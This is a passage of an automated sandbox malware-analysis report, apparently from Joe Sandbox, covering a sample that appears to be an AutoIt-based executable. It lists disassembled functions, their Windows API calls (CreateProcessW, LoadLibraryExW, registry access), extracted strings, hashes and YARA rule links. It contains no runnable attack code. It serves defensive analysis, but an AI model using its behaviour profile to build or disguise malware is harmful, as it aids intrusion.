                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 9721498-966354055
                                                      • Opcode ID: 00701b0c5f834f20d0646b491ca7882dd27787f5ce5b0ea1c5ffaef3b66679ab
                                                      • Instruction ID: 2f2b0e4c4be7e8f4876602ce4e755cb15e61e91ce1a6fb1f44e78fe7320c802a
                                                      • Opcode Fuzzy Hash: 00701b0c5f834f20d0646b491ca7882dd27787f5ce5b0ea1c5ffaef3b66679ab
                                                      • Instruction Fuzzy Hash: BB126B756042119FD714EF14D881A2AB7E5FF89724F08885CF84A9B3A2DB39FD41EB81
                                                      Function 00FB091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FB09C6
                                                      • _wcslen.LIBCMT ref: 00FB0A01
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FB0A54
                                                      • _wcslen.LIBCMT ref: 00FB0A8A
                                                      • _wcslen.LIBCMT ref: 00FB0B06
                                                      • _wcslen.LIBCMT ref: 00FB0B81
                                                        • Part of subcall function 00F3F9F2: _wcslen.LIBCMT ref: 00F3F9FD
                                                        • Part of subcall function 00F82BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F82BFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 1103490817-4258414348
                                                      • Opcode ID: 03941a4045bc4553d60c525e7a5b46a8d0389bed8fe5bdf0b9d7d075b4792452
                                                      • Instruction ID: 81d57c68257ef2f5f7ae8b72416a7aa3e09e9342deadad9d4b24ab6b8d946402
                                                      • Opcode Fuzzy Hash: 03941a4045bc4553d60c525e7a5b46a8d0389bed8fe5bdf0b9d7d075b4792452
                                                      • Instruction Fuzzy Hash: 73E18D326083118FC714EF26C85096AB7E1BF98324B14895DF8969B3A2DB34ED45EB81
                                                      Function 00FAC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1256254125-909552448
                                                      • Opcode ID: 742c474bb753782ba766d67bc0c5d1a78be44f04d447c4acbf82d8f314aa9d61
                                                      • Instruction ID: 1f31341cf6546470ed4eb61cd964b62df4a4f9062c3792256c1f606c59678171
                                                      • Opcode Fuzzy Hash: 742c474bb753782ba766d67bc0c5d1a78be44f04d447c4acbf82d8f314aa9d61
                                                      • Instruction Fuzzy Hash: 077106B3E0416A8BCB20DE79CC516BA3395AFA27B4F110124F8569B285E639CD45B3E0
                                                      Function 00FB833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00FB835A
                                                      • _wcslen.LIBCMT ref: 00FB836E
                                                      • _wcslen.LIBCMT ref: 00FB8391
                                                      • _wcslen.LIBCMT ref: 00FB83B4
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FB83F2
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FB5BF2), ref: 00FB844E
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FB8487
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FB84CA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FB8501
                                                      • FreeLibrary.KERNEL32(?), ref: 00FB850D
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FB851D
                                                      • DestroyIcon.USER32(?,?,?,?,?,00FB5BF2), ref: 00FB852C
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FB8549
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FB8555
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 799131459-1154884017
                                                      • Opcode ID: c9b8cd7b6d177cc689a4e979514712e81e06d001e7063800baa855a531594b41
                                                      • Instruction ID: 25d7e2ed44aece9057aa490ca8ab72d9f3e4dcf5e9b8a6f8c31cd7be4c97e6cb
                                                      • Opcode Fuzzy Hash: c9b8cd7b6d177cc689a4e979514712e81e06d001e7063800baa855a531594b41
                                                      • Instruction Fuzzy Hash: A961CE71900219BAEB24DF65CC81BFF7BACBB44760F104609F815E61D1DF78A941EBA0
                                                      Function 00F27778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 0-1645009161
                                                      • Opcode ID: 62c11bdaaa3ff1e9d39e8f59d95cb0acd9eea32ce07c8d133c1710e3d8f5c7e0
                                                      • Instruction ID: c5f8a0d05aa44d0b6acab457bb7e4379efe0ace539704d9ff9280f205b668e63
                                                      • Opcode Fuzzy Hash: 62c11bdaaa3ff1e9d39e8f59d95cb0acd9eea32ce07c8d133c1710e3d8f5c7e0
                                                      • Instruction Fuzzy Hash: 14811871A04325BBDB20BF61EC42FEE3BA8AF15750F044024F904AB192EB74D945F791
                                                      Function 00F85A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00F85A2E
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F85A40
                                                      • SetWindowTextW.USER32(?,?), ref: 00F85A57
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00F85A6C
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00F85A72
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00F85A82
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00F85A88
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F85AA9
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F85AC3
                                                      • GetWindowRect.USER32(?,?), ref: 00F85ACC
                                                      • _wcslen.LIBCMT ref: 00F85B33
                                                      • SetWindowTextW.USER32(?,?), ref: 00F85B6F
                                                      • GetDesktopWindow.USER32 ref: 00F85B75
                                                      • GetWindowRect.USER32(00000000), ref: 00F85B7C
                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F85BD3
                                                      • GetClientRect.USER32(?,?), ref: 00F85BE0
                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F85C05
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F85C2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                      • String ID:
                                                      • API String ID: 895679908-0
                                                      • Opcode ID: 909aab225a9595fa6230a8636460138083d6b3cbd2a70382a41bfa98159a6bf6
                                                      • Instruction ID: 26ef06e74832e243401649f923a48fff8a6f0a7855e130ebbe77df2bb32bdad4
                                                      • Opcode Fuzzy Hash: 909aab225a9595fa6230a8636460138083d6b3cbd2a70382a41bfa98159a6bf6
                                                      • Instruction Fuzzy Hash: 9D716E31900B09AFDB20EFA8CD85EAEBBF5FF48B14F104618E546A25A0D775E944EF50
                                                      Function 00F400C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F400C6
                                                        • Part of subcall function 00F400ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00FF070C,00000FA0,DB22FEF4,?,?,?,?,00F623B3,000000FF), ref: 00F4011C
                                                        • Part of subcall function 00F400ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F623B3,000000FF), ref: 00F40127
                                                        • Part of subcall function 00F400ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F623B3,000000FF), ref: 00F40138
                                                        • Part of subcall function 00F400ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F4014E
                                                        • Part of subcall function 00F400ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F4015C
                                                        • Part of subcall function 00F400ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F4016A
                                                        • Part of subcall function 00F400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F40195
                                                        • Part of subcall function 00F400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F401A0
                                                      • ___scrt_fastfail.LIBCMT ref: 00F400E7
                                                        • Part of subcall function 00F400A3: __onexit.LIBCMT ref: 00F400A9
                                                      Strings
                                                      • InitializeConditionVariable, xrefs: 00F40148
                                                      • WakeAllConditionVariable, xrefs: 00F40162
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F40122
                                                      • SleepConditionVariableCS, xrefs: 00F40154
                                                      • kernel32.dll, xrefs: 00F40133
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 66158676-1714406822
                                                      • Opcode ID: 52b1a38ba65dd490d6ea64c170971cedf67a1d31843d9ba86b62de3f5567ac24
                                                      • Instruction ID: 33c877da72e55f9b799532a1ac56e53268c51d1f5c5ddc58b98b30ebf9d1ca8e
                                                      • Opcode Fuzzy Hash: 52b1a38ba65dd490d6ea64c170971cedf67a1d31843d9ba86b62de3f5567ac24
                                                      • Instruction Fuzzy Hash: BF21F933E447156BD7106B68AC85B6A3B98DF49B61F000236FE01E3292DFB4D800BED1
                                                      Function 00F830F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 176396367-1603158881
                                                      • Opcode ID: 20d23211f35b5faa4bc83525120822b1d730abd6b6c48f602dec78c20b31a5cf
                                                      • Instruction ID: eb760626eba30e35791a46987094a7398f47e436628a50bae6f654e0df1715a7
                                                      • Opcode Fuzzy Hash: 20d23211f35b5faa4bc83525120822b1d730abd6b6c48f602dec78c20b31a5cf
                                                      • Instruction Fuzzy Hash: D3E1C532E00516ABCB14EF68C8517EEBBB0BF54F20F548129E456F7260DB74AE85B790
                                                      Function 00F944C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(00000000,00000000,00FBCC08), ref: 00F94527
                                                      • _wcslen.LIBCMT ref: 00F9453B
                                                      • _wcslen.LIBCMT ref: 00F94599
                                                      • _wcslen.LIBCMT ref: 00F945F4
                                                      • _wcslen.LIBCMT ref: 00F9463F
                                                      • _wcslen.LIBCMT ref: 00F946A7
                                                        • Part of subcall function 00F3F9F2: _wcslen.LIBCMT ref: 00F3F9FD
                                                      • GetDriveTypeW.KERNEL32(?,00FE6BF0,00000061), ref: 00F94743
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2055661098-1000479233
                                                      • Opcode ID: 0f5a938b40d2e1e9443a6d0ca86c73f5a6ea9127b0e0be54c661c8776cb9f862
                                                      • Instruction ID: 59e5aefa8aceac1f6d8b64ea39bb16983aaabfddf58e6980ded0de160423b5fc
                                                      • Opcode Fuzzy Hash: 0f5a938b40d2e1e9443a6d0ca86c73f5a6ea9127b0e0be54c661c8776cb9f862
                                                      • Instruction Fuzzy Hash: 44B10171A083029FDB10DF28C890E6AB7E5BFB5760F50491DF496C7291D734E846EB92
                                                      Function 00FAAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00FAB198
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB1B0
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB1D4
                                                      • _wcslen.LIBCMT ref: 00FAB200
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB214
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB236
                                                      • _wcslen.LIBCMT ref: 00FAB332
                                                        • Part of subcall function 00F905A7: GetStdHandle.KERNEL32(000000F6), ref: 00F905C6
                                                      • _wcslen.LIBCMT ref: 00FAB34B
                                                      • _wcslen.LIBCMT ref: 00FAB366
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FAB3B6
                                                      • GetLastError.KERNEL32(00000000), ref: 00FAB407
                                                      • CloseHandle.KERNEL32(?), ref: 00FAB439
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAB44A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAB45C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAB46E
                                                      • CloseHandle.KERNEL32(?), ref: 00FAB4E3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 2178637699-0
                                                      • Opcode ID: 3e5619dfccecdab546504d1b7aebd2fa63849d221432661051458622725b8cc7
                                                      • Instruction ID: a3b544b740921ab17082c77cd4432ae86e904b8bcbd60563eec26e38b1b5b55b
                                                      • Opcode Fuzzy Hash: 3e5619dfccecdab546504d1b7aebd2fa63849d221432661051458622725b8cc7
                                                      • Instruction Fuzzy Hash: E6F1B2719043409FC714EF24C891B6FBBE5AF86320F18855DF8959B2A2CB35EC44EB52
                                                      Function 00F2326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemCount.USER32(00FF1990), ref: 00F62F8D
                                                      • GetMenuItemCount.USER32(00FF1990), ref: 00F6303D
                                                      • GetCursorPos.USER32(?), ref: 00F63081
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F6308A
                                                      • TrackPopupMenuEx.USER32(00FF1990,00000000,?,00000000,00000000,00000000), ref: 00F6309D
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F630A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      • API String ID: 36266755-4108050209
                                                      • Opcode ID: c1231d5f3fd22b07eaa7466782ba019858d910bddc8237272bf4830b5e552f5d
                                                      • Instruction ID: 50548e1f4532926c02a239c9b4b2ebdab0f90192c809637c89ce991058e5d3fe
                                                      • Opcode Fuzzy Hash: c1231d5f3fd22b07eaa7466782ba019858d910bddc8237272bf4830b5e552f5d
                                                      • Instruction Fuzzy Hash: 5F713871A40215BEEB218F24DC89FAABF69FF05334F200216F5246A1E0C7B5A910FB91
                                                      Function 00FB6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00FB6DEB
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FB6E5F
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FB6E81
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FB6E94
                                                      • DestroyWindow.USER32(?), ref: 00FB6EB5
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F20000,00000000), ref: 00FB6EE4
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FB6EFD
                                                      • GetDesktopWindow.USER32 ref: 00FB6F16
                                                      • GetWindowRect.USER32(00000000), ref: 00FB6F1D
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FB6F35
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FB6F4D
                                                        • Part of subcall function 00F39944: GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 2429346358-3619404913
                                                      • Opcode ID: 3fcc63d7ab0f78ea94667266cd14cf0281cfa0d6b8bc393301f8187a2f0590fb
                                                      • Instruction ID: 21b1ee875483bc9c68ed9dceb080db70a9a5f0eb68bb59907f8e533d765df5fb
                                                      • Opcode Fuzzy Hash: 3fcc63d7ab0f78ea94667266cd14cf0281cfa0d6b8bc393301f8187a2f0590fb
                                                      • Instruction Fuzzy Hash: DE716671904244AFDB21CF19DC84EBABBE9BB89310F04051DF989C7261D7B4E905EF56
                                                      Function 00FB911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00FB9147
                                                        • Part of subcall function 00FB7674: ClientToScreen.USER32(?,?), ref: 00FB769A
                                                        • Part of subcall function 00FB7674: GetWindowRect.USER32(?,?), ref: 00FB7710
                                                        • Part of subcall function 00FB7674: PtInRect.USER32(?,?,00FB8B89), ref: 00FB7720
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FB91B0
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FB91BB
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FB91DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FB9225
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FB923E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FB9255
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FB9277
                                                      • DragFinish.SHELL32(?), ref: 00FB927E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FB9371
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
